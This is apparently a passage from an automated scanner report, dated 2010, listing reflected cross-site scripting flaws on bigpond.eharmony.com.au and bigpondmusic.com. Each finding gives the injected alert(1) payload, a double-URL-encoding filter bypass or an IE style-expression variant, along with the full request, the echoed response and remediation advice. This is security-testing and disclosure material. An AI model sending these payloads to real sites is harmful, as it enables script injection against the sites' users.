                       s.prop25="";                        
                       s.prop31="";
                       s.prop32="";

                       /* cid,aid,pid,aff_id */
                       s.prop8="55653228d2";alert(1)//66a421fe9a4";
                       s.evar8="55653228d2";alert(1)//66a421fe9a4";

                       s.prop7="1000";
                       s.evar7="1000";

                       s.prop33="1000";
                       s.evar33="1000";

                       s.prop48="";
                       s.evar48="";

                       /* Conver
...[SNIP]...

2.3. http://bigpond.eharmony.com.au/ [pid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpond.eharmony.com.au
Path:   /

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5b6e6"%3balert(1)//d81f9eceae8 was submitted in the pid parameter. This input was echoed as 5b6e6";alert(1)//d81f9eceae8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?cid=55653&aid=1000&pid=10005b6e6"%3balert(1)//d81f9eceae8&ref=Dating HTTP/1.1
Host: bigpond.eharmony.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:27:02 GMT
Server: Apache/2.2.16 (Unix)
X-Powered-By: PHP/5.2.14
Set-Cookie: eh_aff_tracking=cid=55653|aid=1000|pid=10005b6e6alert1d81f9eceae8|ref=Dating; expires=Thu, 23-Dec-2010 03:27:02 GMT; path=/; domain=.eharmony.com.au
Cache-Control: max-age=900
Expires: Tue, 23 Nov 2010 03:42:02 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: BIGipServerFront=3943633324.16671.0000; path=/
Set-Cookie: lbid=26761b98-9988-4033-50f8-4f5e01c879ab;expires=Sun, 22-May-2011 03:27:02 GMT;path=/;domain=.eharmony.com.au;
Content-Length: 37512

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><!-- PAGE OK --><head><meta http-equ
...[SNIP]...
s.prop25="";                        
                       s.prop31="";
                       s.prop32="";

                       /* cid,aid,pid,aff_id */
                       s.prop8="55653";
                       s.evar8="55653";

                       s.prop7="1000";
                       s.evar7="1000";

                       s.prop33="10005b6e6";alert(1)//d81f9eceae8";
                       s.evar33="10005b6e6";alert(1)//d81f9eceae8";

                       s.prop48="";
                       s.evar48="";

                       /* Conversion variables */
                       s.products="";
                       s.events="";
                       s.eVar1="";
                       s.eVar2=""
...[SNIP]...

2.4. http://bigpondmusic.com/ [cid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /

Issue detail

The value of the cid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc97d"style%3d"x%3aexpression(alert(1))"3d602eff078 was submitted in the cid parameter. This input was echoed as cc97d"style="x:expression(alert(1))"3d602eff078 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /?cid=bph-music-headcc97d"style%3d"x%3aexpression(alert(1))"3d602eff078 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:11:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 155790


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>BigPond Music - Music Downlo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/?cid=bph-music-headcc97d"style="x:expression(alert(1))"3d602eff078" />
...[SNIP]...

2.5. http://bigpondmusic.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c8ab"style%3d"x%3aexpression(alert(1))"27f2f63ab70 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7c8ab"style="x:expression(alert(1))"27f2f63ab70 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /?7c8ab"style%3d"x%3aexpression(alert(1))"27f2f63ab70=1 HTTP/1.1
Host: bigpondmusic.com
Proxy-Connection: keep-alive
Referer: http://www.telstraenterprise.com/Pages/Home.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Tue, 23 Nov 2010 02:44:20 GMT
Content-Length: 155765


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>BigPond Music - Music Downlo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/?7c8ab"style="x:expression(alert(1))"27f2f63ab70=1" />
...[SNIP]...

2.6. http://bigpondmusic.com/ [ref parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /

Issue detail

The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 704f3"style%3d"x%3aexpression(alert(1))"b95956680e9 was submitted in the ref parameter. This input was echoed as 704f3"style="x:expression(alert(1))"b95956680e9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /?ref=Net-Head-Music704f3"style%3d"x%3aexpression(alert(1))"b95956680e9 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:11:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 155783


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>BigPond Music - Music Downlo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/?ref=Net-Head-Music704f3"style="x:expression(alert(1))"b95956680e9" />
...[SNIP]...

2.7. http://bigpondmusic.com/100/70 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /100/70

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1a30'%3bd1138b1a62b was submitted in the REST URL parameter 1. This input was echoed as f1a30';d1138b1a62b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /100f1a30'%3bd1138b1a62b/70 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:29:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87872


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
lstrabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = '100f1a30';d1138b1a62b';
   s.prop4 = '70';
   
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
   s.prop11 = 'N
...[SNIP]...

2.8. http://bigpondmusic.com/100/70 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /100/70

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2e6b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e32cac2f6a96 was submitted in the REST URL parameter 1. This input was echoed as d2e6b"><script>alert(1)</script>32cac2f6a96 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /100d2e6b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e32cac2f6a96/70 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:29:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88199


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/100d2e6b"><script>alert(1)</script>32cac2f6a96/70" />
...[SNIP]...

2.9. http://bigpondmusic.com/100/70 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /100/70

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65295%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e803665935d5 was submitted in the REST URL parameter 2. This input was echoed as 65295"><script>alert(1)</script>803665935d5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /100/7065295%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e803665935d5 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:29:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88311


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/100/7065295"><script>alert(1)</script>803665935d5" />
...[SNIP]...

2.10. http://bigpondmusic.com/100/70 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /100/70

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4ccad'%3b8b45135ef4a was submitted in the REST URL parameter 2. This input was echoed as 4ccad';8b45135ef4a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /100/704ccad'%3b8b45135ef4a HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:29:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88005


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
calhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = '100';
   s.prop4 = '704ccad';8b45135ef4a';
   
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
   s.prop11 = 'Non-Registered-Musi
...[SNIP]...

2.11. http://bigpondmusic.com/100/70 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /100/70

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b21f"style%3d"x%3aexpression(alert(1))"d5b1a6bf075 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2b21f"style="x:expression(alert(1))"d5b1a6bf075 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /100/70?2b21f"style%3d"x%3aexpression(alert(1))"d5b1a6bf075=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:29:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 163568


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Get the best 100 albums from
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/100/70?2b21f"style="x:expression(alert(1))"d5b1a6bf075=1" />
...[SNIP]...

2.12. http://bigpondmusic.com/100/80 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /100/80

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b20ec'%3bc7b5b48db1a was submitted in the REST URL parameter 1. This input was echoed as b20ec';c7b5b48db1a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /100b20ec'%3bc7b5b48db1a/80 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:30:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87780


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
lstrabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = '100b20ec';c7b5b48db1a';
   s.prop4 = '80';
   
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
   s.prop11 = 'N
...[SNIP]...

2.13. http://bigpondmusic.com/100/80 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /100/80

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac9f7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee18865dec0f was submitted in the REST URL parameter 1. This input was echoed as ac9f7"><script>alert(1)</script>e18865dec0f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /100ac9f7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee18865dec0f/80 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:29:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88311


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/100ac9f7"><script>alert(1)</script>e18865dec0f/80" />
...[SNIP]...

2.14. http://bigpondmusic.com/100/80 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /100/80

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8469a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec4c8c7be166 was submitted in the REST URL parameter 2. This input was echoed as 8469a"><script>alert(1)</script>c4c8c7be166 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /100/808469a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec4c8c7be166 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:30:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87881


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/100/808469a"><script>alert(1)</script>c4c8c7be166" />
...[SNIP]...

